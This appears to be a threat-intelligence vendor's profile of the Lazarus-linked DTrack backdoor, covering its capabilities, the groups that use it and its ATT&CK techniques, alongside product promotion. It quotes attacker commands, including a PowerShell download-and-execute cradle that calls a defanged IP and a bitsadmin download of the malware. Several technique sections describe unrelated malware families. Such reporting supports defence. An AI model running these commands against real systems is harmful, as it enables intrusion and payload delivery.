Dtrack
DTrack is a backdoor/remote access trojan and infostealer associated with the Lazarus Group and specifically linked in the content to Andariel/WASSONITE/Jumpy Pisces activity. It was first publicly disclosed in late September 2019 and was reported targeting Indian financial institutions, research centers, and a nuclear power facility in India. The malware has been described as loosely connected to ATMDTrack, an earlier Lazarus-linked malware used in ATM theft operations.
The malware is used for remote access, reconnaissance, credential and host information collection, and as a dropper for additional payloads. Reported capabilities in the content include keylogging, retrieving browser history, collecting Windows registry values such as RegisteredOwner, RegisteredOrganization, and InstallDate, saving collected data to disk, multiple file formats, and network shares, and packing collected data into a password-protected archive for staging or exfiltration. One report cited in the content states that a DTrack variant deployed prior to Maui ransomware executed embedded shellcode and loaded a final Windows in-memory payload responsible for collecting victim information and sending it to a remote host.
Execution and evasion details mentioned in the content include use of a dropper with an encrypted payload embedded as extra data, process hollowing shellcode targeting a predefined list of %SYSTEM32% processes, and code that calls LoadLibrary and GetProcAddress. Persistence behavior includes adding a Windows service named WBService. The malware has also been observed hiding in replicas of legitimate programs such as OllyDbg, 7-Zip, and FileZilla.
The content ties DTrack to multiple North Korea-linked operations. WASSONITE operations relied on DTrack for remote access and credential capture. Andariel is described as deploying DTrack alongside Maui ransomware. In a 2024 Play ransomware incident investigated by Unit 42, Jumpy Pisces/Andariel reportedly spread DTrack over SMB after gaining access via a compromised account; DTrack execution was blocked by EDR in that case. The same reporting describes DTrack as an infostealer used in incidents attributed to North Korean threat groups and notes that it compresses data disguised as a GIF file. The content also states that Andariel exploited Log4j in mid-2022 and downloaded DTrack shortly after exploitation.
High-confidence identifiers and aliases directly mentioned in the content include DTrack, VinoSiren, and Preft, as well as the persistence service name WBService.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
approximately ten hours prior to deploying Maui... the group deployed a variant of the well-known DTrack malware... Once this malware is spawned, it executes an embedded shellcode, loading a final Windows in-memory payload... responsible for collecting victim information and sending it to the remote host.
Groups observed using it
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
WASSONITE operations rely on deploying DTrack malware for remote access to victim machines... Researchers first disclosed DTrack in late September 2019, and identified the tool targeting Indian financial institutions and research centers. DTrack is loosely connected to an earlier observed malware family, ATMDTrack, used for robbing ATM machines.
WASSONITE operations rely on deploying DTrack malware for remote access to victim machines... Researchers first disclosed DTrack in late September 2019.
"DTrack (also known as VinoSiren and Preft). DTrack was used in 2019 to target a nuclear power facility in India..."
Techniques & procedures
29 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
Initial Access
"actors leverage legitimate credentials to log into external remote services"; "used legitimate credentials to gain initial access, maintain access, and exfiltrate data"; "used valid accounts for initial access and privilege escalation"
"The other victim operated a vulnerable Weblogic server... compromised this server via the CVE-2017-10271 exploit." | "In one victim system, we discovered that a well-known simple HTTP server, HFS7, had deployed the malware above. After an unknown exploit was used on a vulnerable HFS server and “whoami” was executed..."
Execution
6 techniques
Execution
"powershell.exe IEX (New-Object Net.WebClient).DownloadString('hxxp://145.232.235[.]222/usr/users/mini.ps1')"
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
Astaroth uses the LoadLibraryExW() function to load additional modules. Attor's dispatcher can execute additional plugins by loading the respective DLLs. ... LightSpy's main executable and module .dylib binaries are loaded using ... dlopen() ... dlsym() ... RotaJakiro uses ... .so files ... using dlopen() and dlsym().
"...downloading and executing the above DTrack malware via bitsadmin.exe: bitsadmin.exe /transfer myJob /download ..."
...uses the LoadLibraryExW() function to load additional modules... execute additional plugins by loading the respective DLLs... loaded and executed DLLs in memory during runtime... loads a dynamic library (.dylib file) using dlopen() and obtains a function pointer... using dlopen() and dlsym()... calls LoadLibrary then executes exports from a DLL.
Persistence
5 techniques
Persistence
"actors leverage legitimate credentials to log into external remote services"; "used legitimate credentials to gain initial access, maintain access, and exfiltrate data"; "used valid accounts for initial access and privilege escalation"
"...downloading and executing the above DTrack malware via bitsadmin.exe: bitsadmin.exe /transfer myJob /download ..."
Privilege Escalation
4 techniques
Privilege Escalation
"actors leverage legitimate credentials to log into external remote services"; "used legitimate credentials to gain initial access, maintain access, and exfiltrate data"; "used valid accounts for initial access and privilege escalation"
Stealth
7 techniques
Stealth
During the 2016 Ukraine Electric Power Attack, DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files.
Examples throughout the content include deleting tools, logs, malware-related files, staged archives, screenshots, temporary files, and exfiltrated data 'to cover their tracks,' 'reduce their footprint,' 'remove traces of activity,' or as part of 'post-intrusion cleanup.'
The content repeatedly describes threat actors and malware deleting files, tools, scripts, logs, droppers, staged data, and artifacts from compromised systems to cover tracks, remove evidence, or self-delete.
"actors leverage legitimate credentials to log into external remote services"; "used legitimate credentials to gain initial access, maintain access, and exfiltrate data"; "used valid accounts for initial access and privilege escalation"
The content repeatedly describes malware and threat actors decoding, decrypting, deobfuscating, or unpacking payloads, strings, configuration data, commands, and C2 responses prior to execution or use.
"...downloading and executing the above DTrack malware via bitsadmin.exe: bitsadmin.exe /transfer myJob /download ..."
...uses the LoadLibraryExW() function to load additional modules... execute additional plugins by loading the respective DLLs... loaded and executed DLLs in memory during runtime... loads a dynamic library (.dylib file) using dlopen() and obtains a function pointer... using dlopen() and dlsym()... calls LoadLibrary then executes exports from a DLL.
Discovery
7 techniques
Discovery
The content repeatedly describes malware and threat actors querying, enumerating, searching, reading, or checking Windows Registry keys and values, e.g., "ADVSTORESHELL can enumerate registry keys," "APT41 queried registry values to determine items such as configured RDP ports and network configurations," and "Reg may be used to gather details from the Windows Registry of a local or remote system at the command-line interface."
The content repeatedly describes malware and threat actors using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, nbtstat, netsh, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, domains, and network adapter/interface details.
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
The content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").
Lateral Movement
1 technique
Lateral Movement
Collection
3 techniques
Collection
The content repeatedly describes threat actors and malware collecting, stealing, identifying, copying, or staging files, documents, credentials, logs, databases, and other information from compromised hosts or local systems.
The content repeatedly describes adversaries and malware storing collected data, command output, credentials, archives, or files in local temporary folders, working directories, hidden directories, registry locations, recycle bins, or specific files prior to exfiltration.
"AppleSeed has compressed collected data before exfiltration."; "APT28 used a publicly available tool to gather and compress multiple documents..."; "Aria-body has used ZIP to compress data..."; "Cadelspy...compress stolen data into a .cab file."; "Daserf hides collected data in password-protected .rar archives."; "FIN6 has compressed log files into a ZIP archive prior to staging and exfiltration."; "Lazarus Group has compressed exfiltrated data with RAR...archive specified directories in .zip format"; "XCSSET will compress entire ~/Desktop folders..."
IOCs tracked for this family
14 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
44 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Lazarus-linked backdoor/RAT supporting file transfer, keylogging, screenshot capture, and lateral movement; newer variants use process hollowing (e.g., explorer.exe).
Custom North Korea-linked malware used for lateral movement and persistence in compromised environments.
Custom Lazarus malware family used for persistence and remote access within victim environments.
Infostealer used for collection; collected data is compressed and disguised as a GIF file; deployed alongside Sliver for persistence/lateral movement over SMB.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.